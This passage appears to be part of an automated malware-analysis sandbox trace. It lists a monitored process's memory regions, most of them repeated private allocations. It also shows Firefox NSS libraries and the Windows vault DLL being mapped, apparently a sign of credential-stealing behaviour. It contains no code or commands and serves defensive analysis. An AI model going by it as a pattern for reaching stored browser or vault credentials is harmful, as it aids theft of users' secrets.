0x6de81a44 region_type = mapped_file name = "msvcr120.dll" filename = "\\Windows\\SysWOW64\\msvcr120.dll" (normalized: "c:\\windows\\syswow64\\msvcr120.dll") Region: id = 17762 start_va = 0x6dd90000 end_va = 0x6de00fff monitored = 0 entry_point = 0x6ddcb707 region_type = mapped_file name = "msvcp120.dll" filename = "\\Windows\\SysWOW64\\msvcp120.dll" (normalized: "c:\\windows\\syswow64\\msvcp120.dll") Region: id = 17763 start_va = 0x6de10000 end_va = 0x6de17fff monitored = 0 entry_point = 0x6de117b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 17764 start_va = 0x8510000 end_va = 0x860ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008510000" filename = "" Region: id = 17765 start_va = 0x8510000 end_va = 0x870efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008510000" filename = "" Region: id = 17766 start_va = 0x8600000 end_va = 0x86fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008600000" filename = "" Region: id = 17767 start_va = 0x8c00000 end_va = 0x8d00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c00000" filename = "" Region: id = 17768 start_va = 0x8c00000 end_va = 0x8d00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c00000" filename = "" Region: id = 17769 start_va = 0x8c00000 end_va = 0x8cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c00000" filename = "" Region: id = 17770 start_va = 0x6dd60000 end_va = 0x6dd86fff monitored = 0 entry_point = 0x6dd7ccae region_type = mapped_file name = "softokn3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\softokn3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.dll") Region: id = 17771 start_va = 0x6dd40000 end_va = 0x6dd57fff monitored = 0 entry_point = 0x6dd52731 region_type = mapped_file name = "nssdbm3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.dll") Region: id = 17775 start_va = 0x6dce0000 end_va = 0x6dd35fff monitored = 0 entry_point = 0x6dd1d187 region_type = mapped_file name = "freebl3.dll" filename = "\\Program Files (x86)\\Mozilla Firefox\\freebl3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.dll") Region: id = 17960 start_va = 0x70050000 end_va = 0x70089fff monitored = 0 entry_point = 0x70069be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 17961 start_va = 0x74290000 end_va = 0x74357fff monitored = 0 entry_point = 0x742fae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 17962 start_va = 0x8510000 end_va = 0x8591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008510000" filename = "" Region: id = 17969 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17970 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17971 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17972 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17973 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17974 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17975 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17976 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17977 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17978 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17982 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17983 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17988 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17989 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17990 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17991 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17992 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17993 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17994 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 17995 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18004 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18005 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18006 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18007 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18009 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18010 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18011 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18012 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18013 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18014 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18015 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18016 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18018 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18019 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18023 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18024 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18026 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18027 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18028 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18029 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18030 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18031 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18032 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18033 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18034 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18035 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18036 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18037 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18039 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18040 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18041 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18042 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18043 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18044 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18045 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18046 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18051 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18052 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18054 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18055 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18056 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18057 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18060 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18061 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18063 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18064 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18065 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18066 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18067 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18068 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18069 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18070 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18071 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18072 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18073 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18074 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18075 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18076 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18077 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18078 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18079 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18080 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18081 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18082 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18083 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18084 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18085 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18086 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18087 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18088 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18089 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18090 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18091 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18092 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18093 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18094 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18095 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18096 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18097 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18098 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18099 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18100 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18101 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18102 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18103 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18104 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18105 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18106 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18107 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18108 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18109 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18110 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18111 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18112 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18113 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18114 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18115 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18116 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18117 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18118 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18119 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18120 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18121 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18122 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18125 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18126 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18127 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18128 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18129 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18130 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18131 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18132 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18133 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18134 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18135 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18136 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18137 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18138 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18139 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18140 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18141 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18142 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18143 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18144 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18145 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18146 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18147 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18148 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18149 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18150 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18151 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18152 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18153 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18154 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18155 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18156 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18157 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18158 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18159 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18160 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18161 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18162 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18163 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18164 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18165 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18166 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18167 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18168 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18169 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18170 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18171 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18172 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18173 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18174 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18175 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18176 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18179 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18180 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18181 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18182 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18201 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18202 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18203 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" 